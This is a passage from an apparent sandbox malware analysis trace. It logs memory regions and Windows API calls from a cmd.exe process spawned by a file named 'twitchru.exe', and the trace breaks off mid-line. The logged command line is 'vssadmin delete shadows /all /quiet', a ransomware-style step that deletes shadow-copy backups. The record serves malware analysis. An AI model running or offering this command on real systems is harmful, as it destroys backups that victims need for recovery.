end_va = 0x4efffff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 1075 start_va = 0x4f00000 end_va = 0x4f01fff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1076 start_va = 0x4f10000 end_va = 0x4f23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f10000" filename = "" Region: id = 1077 start_va = 0x4f30000 end_va = 0x4f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f30000" filename = "" Region: id = 1078 start_va = 0x4f70000 end_va = 0x506ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 1079 start_va = 0x76f90000 end_va = 0x77108fff entry_point = 0x76f90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1080 start_va = 0x7eb40000 end_va = 0x7eb62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb40000" filename = "" Region: id = 1081 start_va = 0x7eb67000 end_va = 0x7eb67fff entry_point = 0x0 region_type = private name = "private_0x000000007eb67000" filename = "" Region: id = 1082 start_va = 0x7eb6c000 end_va = 0x7eb6cfff entry_point = 0x0 region_type = private name = "private_0x000000007eb6c000" filename = "" Region: id = 1083 start_va = 0x7eb6d000 end_va = 0x7eb6ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb6d000" filename = "" Region: id = 1084 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1085 start_va = 0x7fff0000 end_va = 0x7dfa4d88ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1086 start_va = 0x7dfa4d890000 end_va = 0x7ffa4d88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfa4d890000" filename = "" Region: id = 1087 start_va = 0x7ffa4d890000 end_va = 0x7ffa4da51fff entry_point = 0x7ffa4d890000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1088 start_va = 0x7ffa4da52000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffa4da52000" filename = "" Region: id = 1089 start_va = 0x5070000 end_va = 0x5073fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005070000" filename = "" Region: id = 1090 start_va = 0x5080000 end_va = 0x5080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005080000" filename = "" Region: id = 1091 start_va = 0x5090000 end_va = 0x5091fff entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1092 start_va = 0x51a0000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 1093 start_va = 0x716e0000 end_va = 0x71752fff entry_point = 0x716e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1094 start_va = 0x71770000 end_va = 0x717befff entry_point = 0x71770000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1095 start_va = 0x71760000 end_va = 0x71767fff entry_point = 0x71760000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1096 start_va = 0x4ee0000 end_va = 0x4eeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ee0000" filename = "" Region: id = 1097 start_va = 0x50a0000 end_va = 0x515dfff entry_point = 0x50a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1098 start_va = 0x5160000 end_va = 0x519ffff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 1099 start_va = 0x51b0000 end_va = 0x52affff entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 1100 start_va = 0x5340000 end_va = 0x543ffff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 1101 start_va = 0x5530000 end_va = 0x553ffff entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 1102 start_va = 0x75e40000 end_va = 0x75efdfff entry_point = 0x75e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1103 start_va = 0x76510000 end_va = 0x76685fff entry_point = 0x76510000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1104 start_va = 0x76870000 end_va = 0x7695ffff entry_point = 0x76870000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1105 start_va = 0x7ea40000 end_va = 0x7eb3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea40000" filename = "" Region: id = 1106 start_va = 0x7eb69000 end_va = 0x7eb6bfff entry_point = 0x0 region_type = private name = "private_0x000000007eb69000" filename = "" Region: id = 1107 start_va = 0x4ef0000 end_va = 0x4ef3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ef0000" filename = "" Region: id = 1108 start_va = 0x4f00000 end_va = 0x4f03fff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1109 start_va = 0x5540000 end_va = 0x5876fff entry_point = 0x5540000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 35 os_tid = 0xb08 [0230.700] GetModuleHandleA (lpModuleName=0x0) returned 0x8c0000 [0230.700] __set_app_type (_Type=0x1) [0230.700] __p__fmode () returned 0x75ef4d6c [0230.700] __p__commode () returned 0x75ef5b1c [0230.700] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8d36e0) returned 0x0 [0230.700] __getmainargs (in: _Argc=0x8e50e8, _Argv=0x8e50ec, _Env=0x8e50f0, _DoWildCard=0, _StartInfo=0x8e50fc | out: _Argc=0x8e50e8, _Argv=0x8e50ec, _Env=0x8e50f0) returned 0 [0230.700] GetCurrentThreadId () returned 0xb08 [0230.700] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb08) returned 0x84 [0230.701] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0230.701] GetProcAddress (hModule=0x76870000, lpProcName="SetThreadUILanguage") returned 0x768b2780 [0230.701] SetThreadUILanguage (LangId=0x0) returned 0x409 [0230.720] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0230.720] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x506fda4 | out: phkResult=0x506fda4*=0x0) returned 0x2 [0230.720] VirtualQuery (in: lpAddress=0x506fdab, lpBuffer=0x506fd5c, dwLength=0x1c | out: lpBuffer=0x506fd5c*(BaseAddress=0x506f000, AllocationBase=0x4f70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0230.720] VirtualQuery (in: lpAddress=0x4f70000, lpBuffer=0x506fd5c, dwLength=0x1c | out: lpBuffer=0x506fd5c*(BaseAddress=0x4f70000, AllocationBase=0x4f70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0230.720] VirtualQuery (in: lpAddress=0x4f71000, lpBuffer=0x506fd5c, dwLength=0x1c | out: lpBuffer=0x506fd5c*(BaseAddress=0x4f71000, AllocationBase=0x4f70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0230.720] VirtualQuery (in: lpAddress=0x4f73000, lpBuffer=0x506fd5c, dwLength=0x1c | out: lpBuffer=0x506fd5c*(BaseAddress=0x4f73000, AllocationBase=0x4f70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0230.720] VirtualQuery (in: lpAddress=0x5070000, lpBuffer=0x506fd5c, dwLength=0x1c | out: lpBuffer=0x506fd5c*(BaseAddress=0x5070000, AllocationBase=0x5070000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0230.720] GetConsoleOutputCP () returned 0x1b5 [0230.721] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x8ee460 | out: lpCPInfo=0x8ee460) returned 1 [0230.721] SetConsoleCtrlHandler (HandlerRoutine=0x8df980, Add=1) returned 1 [0230.731] _get_osfhandle (_FileHandle=1) returned 0xc [0230.731] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x0) returned 1 [0230.732] _get_osfhandle (_FileHandle=1) returned 0xc [0230.732] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x8ee40c | out: lpMode=0x8ee40c) returned 1 [0230.732] _get_osfhandle (_FileHandle=1) returned 0xc [0230.732] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0230.732] _get_osfhandle (_FileHandle=0) returned 0x8 [0230.732] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x8ee408 | out: lpMode=0x8ee408) returned 1 [0230.733] _get_osfhandle (_FileHandle=0) returned 0x8 [0230.733] SetConsoleMode (hConsoleHandle=0x8, dwMode=0x1e7) returned 1 [0230.733] GetEnvironmentStringsW () returned 0x5347e08* [0230.733] FreeEnvironmentStringsA (penv="=") returned 1 [0230.733] GetEnvironmentStringsW () returned 0x5347e08* [0230.733] FreeEnvironmentStringsA (penv="=") returned 1 [0230.733] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x506ed08 | out: phkResult=0x506ed08*=0x94) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x0, lpData=0x506ed14*=0x75, lpcbData=0x506ed10*=0x1000) returned 0x2 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x4, lpData=0x506ed14*=0x1, lpcbData=0x506ed10*=0x4) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x0, lpData=0x506ed14*=0x1, lpcbData=0x506ed10*=0x1000) returned 0x2 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x4, lpData=0x506ed14*=0x0, lpcbData=0x506ed10*=0x4) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x4, lpData=0x506ed14*=0x40, lpcbData=0x506ed10*=0x4) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x4, lpData=0x506ed14*=0x40, lpcbData=0x506ed10*=0x4) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x0, lpData=0x506ed14*=0x40, lpcbData=0x506ed10*=0x1000) returned 0x2 [0230.734] RegCloseKey (hKey=0x94) returned 0x0 [0230.734] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x506ed08 | out: phkResult=0x506ed08*=0x94) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x0, lpData=0x506ed14*=0x40, lpcbData=0x506ed10*=0x1000) returned 0x2 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x4, lpData=0x506ed14*=0x1, lpcbData=0x506ed10*=0x4) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x0, lpData=0x506ed14*=0x1, lpcbData=0x506ed10*=0x1000) returned 0x2 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x4, lpData=0x506ed14*=0x0, lpcbData=0x506ed10*=0x4) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x4, lpData=0x506ed14*=0x9, lpcbData=0x506ed10*=0x4) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x4, lpData=0x506ed14*=0x9, lpcbData=0x506ed10*=0x4) returned 0x0 [0230.734] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x506ed0c, lpData=0x506ed14, lpcbData=0x506ed10*=0x1000 | out: lpType=0x506ed0c*=0x0, lpData=0x506ed14*=0x9, lpcbData=0x506ed10*=0x1000) returned 0x2 [0230.734] RegCloseKey (hKey=0x94) returned 0x0 [0230.734] time (in: timer=0x0 | out: timer=0x0) returned 0x5c08fdf1 [0230.735] srand (_Seed=0x5c08fdf1) [0230.735] GetCommandLineW () returned="cmd /c vssadmin delete shadows /all /quiet" [0230.735] GetCommandLineW () returned="cmd /c vssadmin delete shadows /all /quiet" [0230.735] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8f6720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0230.735] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5347e10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0230.735] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0230.735] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0230.735] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x8ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0230.735] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0230.735] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0230.735] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0230.735] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0230.735] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0230.735] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0230.735] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0230.735] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0230.736] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0230.736] GetEnvironmentStringsW () returned 0x5348020* [0230.736] FreeEnvironmentStringsA (penv="=") returned 1 [0230.736] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x8ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0230.736] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x8ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0230.736] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0230.736] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0230.736] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0230.736] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0230.736] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0230.736] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0230.736] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0230.736] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0230.736] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x506fae0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0230.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x506fae0, lpFilePart=0x506fad8 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x506fad8*="system32") returned 0x13 [0230.737] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0230.737] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x506f860 | out: lpFindFileData=0x506f860) returned 0x53405c8 [0230.737] FindClose (in: hFindFile=0x53405c8 | out: hFindFile=0x53405c8) returned 1 [0230.737] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x506f860 | out: lpFindFileData=0x506f860) returned 0x53405c8 [0230.737] FindClose (in: hFindFile=0x53405c8 | out: hFindFile=0x53405c8) returned 1 [0230.737] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0230.737] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0230.737] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0230.740] GetEnvironmentStringsW () returned 0x5348020* [0230.740] FreeEnvironmentStringsA (penv="=") returned 1 [0230.740] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8f6720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0230.741] GetConsoleOutputCP () returned 0x1b5 [0230.747] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x8ee460 | out: lpCPInfo=0x8ee460) returned 1 [0230.747] GetUserDefaultLCID () returned 0x409 [0230.747] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x8f24a0, cchData=8 | out: lpLCData=":") returned 2 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x506fc10, cchData=128 | out: lpLCData="0") returned 2 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x506fc10, cchData=128 | out: lpLCData="0") returned 2 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x506fc10, cchData=128 | out: lpLCData="1") returned 2 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x8f24b0, cchData=8 | out: lpLCData="/") returned 2 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x8f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x8f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x8f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x8f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x8f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x8f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x8f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x8f24c0, cchData=8 | out: lpLCData=".") returned 2 [0230.748] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x8f24e0, cchData=8 | out: lpLCData=",") returned 2 [0230.748] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0230.751] GetConsoleTitleW (in: lpConsoleTitle=0x534a938, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe") returned 0x2a [0230.752] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0230.752] GetProcAddress (hModule=0x76870000, lpProcName="CopyFileExW") returned 0x7688fa80 [0230.752] GetProcAddress (hModule=0x76870000, lpProcName="IsDebuggerPresent") returned 0x7688a790 [0230.752] GetProcAddress (hModule=0x76870000, lpProcName="SetConsoleInputExeNameW") returned 0x766235c0 [0230.754] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0230.754] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0230.754] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0230.754] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0230.754] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0230.754] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0230.754] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0230.756] GetConsoleTitleW (in: lpConsoleTitle=0x506f8f8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe") returned 0x2a [0230.766] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0230.766] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0230.766] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0230.766] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0230.766] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0230.766] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0230.766] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0230.766] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0230.766] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0230.766] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0230.766] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0230.766] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0230.766] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0230.766] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0230.766] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0230.766] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0230.766] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0230.766] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0230.766] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0230.766] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0230.766] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0230.766] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0230.766] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0230.767] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0230.767] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0230.767] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0230.767] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0230.767] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0230.767] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0230.767] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0230.767] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0230.767] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0230.767] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0230.767] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0230.767] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0230.767] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0230.767] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0230.767] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0230.767] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0230.767] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0230.767] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0230.767] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0230.767] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0230.767] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0230.767] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0230.767] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0230.767] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0230.767] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0230.767] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0230.767] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0230.767] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0230.767] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0230.767] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0230.767] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0230.767] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0230.767] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0230.767] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0230.767] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0230.767] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0230.767] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0230.767] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0230.767] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0230.767] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0230.767] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0230.768] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0230.768] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0230.768] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0230.768] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0230.768] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0230.768] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0230.768] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0230.768] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0230.768] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0230.768] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0230.768] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0230.768] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0230.768] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0230.768] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0230.768] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0230.768] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0230.768] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0230.768] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0230.768] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0230.768] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0230.768] 